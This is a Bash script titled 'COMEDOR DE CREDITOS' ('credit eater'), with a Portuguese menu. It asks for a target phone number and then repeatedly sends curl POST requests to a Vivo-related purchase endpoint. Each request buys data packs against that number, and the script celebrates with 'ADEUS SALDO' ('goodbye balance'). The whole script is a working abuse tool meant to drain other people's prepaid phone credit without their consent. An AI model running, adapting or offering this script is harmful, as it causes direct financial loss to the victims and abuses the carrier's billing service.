#!/bin/bash
clear
tit=$"ㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠛⠋⠉⠙⠻⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠹⣿⣿⣶⣶⣦⣬⢹⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠄⠄⠄⣰⣧⡀⠄⠄⠄⠄⠈⢙⡋⣿⣿⣿⢸⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⠰⠼⢯⣿⣿⣦⣄⠄⠄⠄⠈⢡⣿⣿⣿⢸⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⠸⠤⠕⠛⠙⠷⣿⡆⠄⠄⠄⣸⣿⣿⡏⣼⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣴⣿⣿⣿⢡⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⣿⣿⡟⠄⠄⠄⠄⠄⣄⠄⢀⠄⠄⢀⣤⣾⣿⣿⣿⢃⣾⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⣿⠿⣛⣡⣄⣀⠄⠠⢴⣿⣿⡿⣄⣴⣿⣿⣿⣿⣿⢃⣾⣿⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⡏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣩⡽⡁⢸⣿⣿⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⣿⢃⣿⣿⢟⣿⣿⣿⣿⣿⣮⢫⣿⣿⣿⣿⣿⣟⢿⠃⠄⢻⣿⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⡿⣸⠟⣵⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣷⣄⢰⡄⢿⣿⣿⣿\nㅤㅤ⣿⣿⣿⣿⡇⠏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠹⡎⣿⣿⣿\n\e[33;01m██▀ﾠ█▄█ﾠ█ﾠ▄▀▀ﾠ▄▀▄ﾠ█▀▄ﾠ██▀ﾠ█▄ﾠ█ﾠ██▀ﾠ█▀▄\n█▄▄ﾠ█ﾠ█ﾠ█ﾠ▄██ﾠ▀▄▀ﾠ█▀ﾠﾠ█▄▄ﾠ█ﾠ▀█ﾠ█▄▄ﾠ█▀▄\e[0m\nㅤㅤ⡀⠈⢿⠄⣿⡇⠄⠙⠿⣿⡿⠿⢋⣥⣾⣿⣷⣌⠻⢿⣿⣿⡿⠟⣡⣾⣿⣿⠿⢋\nㅤㅤ⠛⠳⠄⢠⣿⠇⠄⣷⡑⢶⣶⢿⣿⣿⣿⣽⣿⣿⣿⣶⣶⡐⣶⣿⠿⠛⣩⡄⠄⢸"
echo -e $tit
sleep .5
echo
echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
sleep .5
while :; do
clear; echo -e $tit; echo
echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
echo
echo -e "\e[01;37m(1) \e[0m\e[01;33mRodar todos 3x (Melhor opção)\e[0m"
echo -e "\e[01;37m(2) \e[0m\e[01;33mContratar 100MB\e[0m"
echo -e "\e[01;37m(3) \e[0m\e[01;33mContratar 200MB\e[0m"
echo -e "\e[01;37m(4) \e[0m\e[01;33mContratar 400MB\e[0m"
echo -e "\e[01;37m(5) \e[0m\e[01;33mRenovar Vivo Turbo\e[0m"
echo -e "\e[01;37m(6) \e[0m\e[01;33mContratar Redes Sociais\e[0m"
echo -e "\e[01;37m(7) \e[0m\e[01;33mContratar Vídeo e Música\e[0m"
echo -e "\e[01;37m(8) \e[0m\e[01;33mCair Fora\e[0m"
aa=$(echo -e "\e[01;37mOpção:\e[0m")
read -n1 -p "$aa" opc
echo

case $opc in
     (1) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aax=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aax" NUMERO
               VEZES=3
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18


         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=100c&act=buypack&impressionUUID=&ispClickId=&logPack=100mb&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
            body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done; echo


         echo -e "\e[01;37;41m HORA DO SHOW 200MB \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=200CPRE&act=buypack&impressionUUID=&ispClickId=&logPack=200cpre&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done; echo


         echo -e "\e[01;37;41m HORA DO SHOW 400MB \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=400c&act=buypack&impressionUUID=&ispClickId=&logPack=400mb_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done; echo


         echo -e "\e[01;37;41m HORA DO SHOW RENOVAR TURBO \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=ANTECIPARVT&act=buypack&impressionUUID=&ispClickId=&logPack=vivotudo_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done; echo


         echo -e "\e[01;37;41m HORA DO SHOW REDES SOCIAIS \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=FACE&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_redessociais_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done; echo


         echo -e "\e[01;37;41m HORA DO SHOW VÍDEO/MUSICA \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=MUVI&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_videomusica_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done;
         break;;
   

       (2) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa2=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa2" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=100c&act=buypack&impressionUUID=&ispClickId=&logPack=100mb&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


      (3) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa3=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa3" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb1=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb1" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=200CPRE&act=buypack&impressionUUID=&ispClickId=&logPack=200cpre&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


      (4) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa4=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa4" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb2=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb2" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=400c&act=buypack&impressionUUID=&ispClickId=&logPack=400mb_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


     (5) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa5=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa5" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb3=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb3" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=ANTECIPARVT&act=buypack&impressionUUID=&ispClickId=&logPack=vivotudo_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


     (6) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa6=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa6" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb4=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb4" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=FACE&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_redessociais_bn&telefone=$NUMDRO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


     (7) echo -e "\e[01;37;41m COLOQUE O DDD+NUMERO \e[0m"
               aa7=$(echo -e "\e[01;37mNÚMERO:\e[0m")
               read -p "$aa7" NUMERO
         echo -e "\e[01;37;41m COMER QUANTAS VEZES? \e[0m"
               bb5=$(echo -e "\e[01;37mVEZES:\e[0m")
               read -p "$bb5" VEZES
         sleep 1; clear
         echo -e $tit; echo
         echo -e "\e[01;37;41m       • COMEDOR DE CREDITOS •        \e[0m"
         sleep .5; echo
         echo -e "\e[01;37;41m VAI BRASILIAM \e[0m"|pv -qL 15
echo -e "\e[01;37;41m NUMERO: $NUMERO | QUANTIDADE: $VEZES \e[0m";echo
         echo -e "\e[01;37;41m HORA DO SHOW \e[0m"|pv -qL 18
         for i in $(seq $VEZES);
         do
             response=$(data=$"pack=MUVI&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_videomusica_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl -s "$site" -d "$data")
             body=$(echo $response | grep -c response)

         case $body in
         1) echo -e "\e[01;32mMERDA FEITA, ADEUS SALDO \e[0m\e[01;37mmais: $i\e[0m"|pv -qL 18;;
         *) echo -e "Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 \e[0m \e[01;37mFINALIZANDO...\e[0m"; echo $response; break
         esac; done
         break;;


     (8) echo -e '\e[01;37;41m Sem choro | @EhisOpeNer \e[0m'|pv -qL 18
            sleep 1
            exit;;

     (*) echo -e "\e[01;37;41m CALMA BARBOLETA \e[0m"
            sleep 1
         esac; done

echo
echo -e "\e[01;37;41m       • Fim de transmissão •        \e[0m"
echo -e '\e[01;37;41m   Não me viu chegando? Mais uma?    \e[0m'
sleep .5
while :; do
      echo -e '\e[01;37m(1)\e[0m Sim\e[0m'
      echo -e '\e[01;37m(2)\e[0m Não\e[0m'
cc=$(echo -e "\e[01;37mOpção:\e[0m")
      read -n1 -p "$cc" cpo
case $cpo in
      (1) echo; echo -e '\e[01;37;41m E lá vamos nós | @EhisOpeNer \e[0m'|pv -qL 18
        sleep 2; ./multi
        break;;
      (2) echo; echo -e "\e[01;37;41m Bye Bye | @EhisOpeNer \e[0m"|pv -qL 15; echo -e "\e[01;37;41m     TUDO NUMA BOA     \e[0m"|pv -qL 18
        sleep 1
        break;;
      (*) echo; echo -e "\e[01;37;41m CALMA BARBOLETA \e[0m"
        sleep 1
esac; done
